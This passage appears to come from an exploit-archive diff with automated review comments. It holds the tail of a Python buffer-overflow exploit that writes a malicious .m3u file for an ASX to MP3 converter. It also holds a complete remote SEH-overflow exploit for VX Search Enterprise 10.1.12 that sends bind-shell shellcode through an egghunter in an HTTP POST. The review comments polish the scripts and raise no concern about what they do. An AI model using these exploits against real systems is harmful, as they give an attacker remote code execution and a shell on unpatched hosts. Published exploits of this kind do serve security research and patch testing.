"\x80\xf3\x44\x3a\x17\xd7\xfe\x46\x9c\xd6\xd0\xce\xe6\xfc" +
"\xf4\x8b\xbd\x9d\xad\x71\x10\xa1\xae\xde\xcd\x07\xa4\xcd" +
"\x1a\x31\xe7\x99\xef\x0c\x18\x5a\x67\x06\x6b\x68\x28\xbc" +
"\xe3\xc0\xa1\x1a\xf3\x27\x98\xdb\x6b\xd6\x22\x1c\xa5\x1d" +
"\x76\x4c\xdd\xb4\xf6\x07\x1d\x38\x23\x87\x4d\x96\x9b\x68" +
"\x3e\x56\x4b\x01\x54\x59\xb4\x31\x57\xb3\xc3\x75\x99\xe7" +
"\x80\x11\xd8\x17\x37\xbe\x55\xf1\x5d\x2e\x30\xa9\xc9\x8c" +
"\x67\x62\x6e\xee\x4d\xde\x27\x78\xd9\x08\xff\x87\xda\x1e" +
"\xac\x24\x72\xc9\x26\x27\x47\xe8\x39\x62\xef\x63\x02\xe5" +
"\x65\x1a\xc1\x97\x7a\x37\xb1\x34\xe8\xdc\x41\x32\x11\x4b" +
"\x16\x13\xe7\x82\xf2\x89\x5e\x3d\xe0\x53\x06\x06\xa0\x8f" +
"\xfb\x89\x29\x5d\x47\xae\x39\x9b\x48\xea\x6d\x73\x1f\xa4" +
"\xdb\x35\xc9\x06\xb5\xef\xa6\xc0\x51\x69\x85\xd2\x27\x76" +
"\xc0\xa4\xc7\xc7\xbd\xf0\xf8\xe8\x29\xf5\x81\x14\xca\xfa" +
"\x58\x9d\xa0\xc0\x80\xbf\xdc\x6c\xd1\xfd\x80\x8e\x0c\xc1" +
"\xbc\x0c\xa4\xba\x3a\x0c\xcd\xbf\x07\x8a\x3e\xb2\x18\x7f" +
"\x40\x61\x18\xaa")
buffer="http://"
buffer+="A"*17417
buffer+="\x53\x93\x42\x7e" #(overwrites EIP in windows XP service pack 3 with the address of user32.dll)
buffer+="\x90"*10 #NOPs
buffer+=shellcode
buffer+="\x90"*10 #NOPs
f=open("exploit.m3u","w")
f.write(buffer);
f.close()
----------------------
Affected Targets
---------------------
ASX to MP3 version 3.1.3.7 and May be less
Solution
---------------
Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing "junk" characters, etc.
Credits
----------
Offensive Security
Rebellious Ceaser
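Review bot: the affected-version information is inconsistent and vague: the script comment names "asx to mp3 converter 3.1.3.7.2010", the 'Affected Targets' section says "version 3.1.3.7 and May be less", and the header carries no vendor, software link or date fields, so a reader cannot tell which build was tested or whether a fixed release exists. State the exact tested build and say how earlier versions were confirmed, or drop the claim about them. The 'Description' ("improper input mechanism") does not say which input is unchecked; from the script it is the length of the "http://" entry in the .m3u file, and the 'Solution' should name a length limit on that field instead of generic validation advice. The prose sections (Description, Proof of Concept, Affected Targets, Solution, Credits) are interleaved with the Python script without comment markers, so the file does not parse as submitted; comment them out or move them into a docstring. The `BadChar` variable is assigned and never used.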

103
platforms/windows/remote/42973.py Executable file

@ -0,0 +1,103 @@
#!/usr/bin/env python
# Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow
# Exploit Author : Revnic Vasile
# Email : revnic[at]gmail[dot]com
# Date : 09-10-2017
# Vendor Homepage : http://www.flexense.com/
# Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.1.12.exe
# Version : 10.1.12
# Tested on : Windows 7 x86 Pro SP1
# Category : Windows Remote Exploit
# CVE : CVE-2017-15220
import socket
import os
import sys
import struct
# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUN=none -e x86/alpha_mixed -f c
shellcode = ("\x89\xe5\xdb\xd3\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x39\x6c\x68\x68\x6f\x72\x55\x50\x77\x70\x53\x30\x43\x50\x4d"
"\x59\x79\x75\x66\x51\x69\x50\x45\x34\x6c\x4b\x32\x70\x70\x30"
"\x4c\x4b\x32\x72\x64\x4c\x6e\x6b\x56\x32\x66\x74\x6e\x6b\x72"
"\x52\x75\x78\x36\x6f\x4e\x57\x33\x7a\x57\x56\x54\x71\x4b\x4f"
"\x4e\x4c\x65\x6c\x65\x31\x73\x4c\x44\x42\x56\x4c\x75\x70\x5a"
"\x61\x38\x4f\x36\x6d\x63\x31\x4f\x37\x5a\x42\x58\x72\x63\x62"
"\x70\x57\x6e\x6b\x42\x72\x44\x50\x4c\x4b\x73\x7a\x45\x6c\x6e"
"\x6b\x72\x6c\x44\x51\x72\x58\x78\x63\x33\x78\x35\x51\x48\x51"
"\x42\x71\x6c\x4b\x43\x69\x37\x50\x77\x71\x5a\x73\x4c\x4b\x67"
"\x39\x77\x68\x5a\x43\x66\x5a\x53\x79\x4e\x6b\x74\x74\x4c\x4b"
"\x43\x31\x39\x46\x70\x31\x6b\x4f\x6e\x4c\x39\x51\x78\x4f\x46"
"\x6d\x53\x31\x38\x47\x55\x68\x39\x70\x72\x55\x7a\x56\x33\x33"
"\x33\x4d\x4b\x48\x35\x6b\x61\x6d\x74\x64\x50\x75\x4a\x44\x31"
"\x48\x4c\x4b\x46\x38\x56\x44\x73\x31\x69\x43\x50\x66\x4c\x4b"
"\x46\x6c\x72\x6b\x4c\x4b\x73\x68\x67\x6c\x43\x31\x4b\x63\x4c"
"\x4b\x46\x64\x4e\x6b\x76\x61\x48\x50\x4c\x49\x71\x54\x34\x64"
"\x35\x74\x63\x6b\x71\x4b\x71\x71\x36\x39\x31\x4a\x46\x31\x39"
"\x6f\x6d\x30\x43\x6f\x73\x6f\x32\x7a\x6e\x6b\x74\x52\x68\x6b"
"\x6c\x4d\x43\x6d\x62\x48\x44\x73\x44\x72\x77\x70\x65\x50\x33"
"\x58\x73\x47\x30\x73\x56\x52\x43\x6f\x31\x44\x61\x78\x62\x6c"
"\x53\x47\x74\x66\x35\x57\x59\x6f\x4a\x75\x6f\x48\x4e\x70\x45"
"\x51\x47\x70\x57\x70\x65\x79\x6f\x34\x71\x44\x62\x70\x43\x58"
"\x46\x49\x4f\x70\x30\x6b\x53\x30\x59\x6f\x6a\x75\x72\x4a\x33"
"\x38\x53\x69\x46\x30\x4b\x52\x69\x6d\x73\x70\x32\x70\x51\x50"
"\x32\x70\x31\x78\x4a\x4a\x36\x6f\x49\x4f\x4b\x50\x39\x6f\x49"
"\x45\x4e\x77\x31\x78\x75\x52\x75\x50\x57\x61\x53\x6c\x6b\x39"
"\x7a\x46\x63\x5a\x54\x50\x71\x46\x32\x77\x43\x58\x6b\x72\x49"
"\x4b\x76\x57\x53\x57\x39\x6f\x38\x55\x46\x37\x42\x48\x38\x37"
"\x48\x69\x57\x48\x49\x6f\x59\x6f\x58\x55\x73\x67\x75\x38\x44"
"\x34\x68\x6c\x57\x4b\x69\x71\x59\x6f\x7a\x75\x51\x47\x6e\x77"
"\x50\x68\x50\x75\x72\x4e\x52\x6d\x51\x71\x6b\x4f\x4a\x75\x31"
"\x78\x52\x43\x70\x6d\x52\x44\x67\x70\x4f\x79\x78\x63\x71\x47"
"\x43\x67\x33\x67\x75\x61\x68\x76\x62\x4a\x55\x42\x70\x59\x56"
"\x36\x7a\x42\x59\x6d\x53\x56\x38\x47\x32\x64\x61\x34\x45\x6c"
"\x76\x61\x35\x51\x6c\x4d\x57\x34\x34\x64\x74\x50\x6b\x76\x43"
"\x30\x50\x44\x30\x54\x52\x70\x50\x56\x53\x66\x53\x66\x42\x66"
"\x46\x36\x70\x4e\x30\x56\x53\x66\x72\x73\x30\x56\x31\x78\x33"
"\x49\x38\x4c\x65\x6f\x4d\x56\x4b\x4f\x59\x45\x4b\x39\x79\x70"
"\x32\x6e\x73\x66\x33\x76\x6b\x4f\x30\x30\x31\x78\x65\x58\x6f"
"\x77\x67\x6d\x31\x70\x79\x6f\x38\x55\x6d\x6b\x6a\x50\x4e\x55"
"\x69\x32\x30\x56\x33\x58\x4c\x66\x4e\x75\x4d\x6d\x4d\x4d\x59"
"\x6f\x38\x55\x37\x4c\x57\x76\x33\x4c\x54\x4a\x6d\x50\x6b\x4b"
"\x4b\x50\x32\x55\x53\x35\x4d\x6b\x63\x77\x57\x63\x73\x42\x32"
"\x4f\x52\x4a\x37\x70\x51\x43\x4b\x4f\x58\x55\x41\x41")
buf_totlen = 5000
dist_seh = 2492
nseh = "\xeb\x06AA"
seh = 0x1011369e
nops = "\x90" * 10
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74"
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
egg = "w00tw00t"
payload = ""
payload += "A"*(dist_seh - len(payload))
payload += nseh
payload += struct.pack("<I", seh)
payload += nops
payload += egghunter
payload += egg
payload += shellcode
payload += "D"*(buf_totlen - len(payload))
buf = "POST /../%s HTTP/1.1\r\n" %payload
buf += "Host: 10.10.10.10\r\n"
buf += "User-Agent: Mozilla/5.0\r\n"
buf += "Connection: close\r\n"
buf += "\r\n"
print "Sending the payload!"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("10.10.10.10", 80))
expl.send(buf)
expl.close()
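Review bot: the target is hard-coded twice, as "Host: 10.10.10.10" in the request and again in `expl.connect(("10.10.10.10", 80))`, so the two can drift apart when someone edits only one; take the host and port from a single variable or from the command line. `os` and `sys` are imported and never used. The script relies on Python 2 (`print "Sending the payload!"` and `str` concatenated with the result of `struct.pack`), but the shebang is plain `python` and the header does not state the interpreter version; add it next to 'Tested on'. The header lists the affected version as 10.1.12 only and says nothing about a fixed release or vendor contact, which is what a reader assessing exposure needs first.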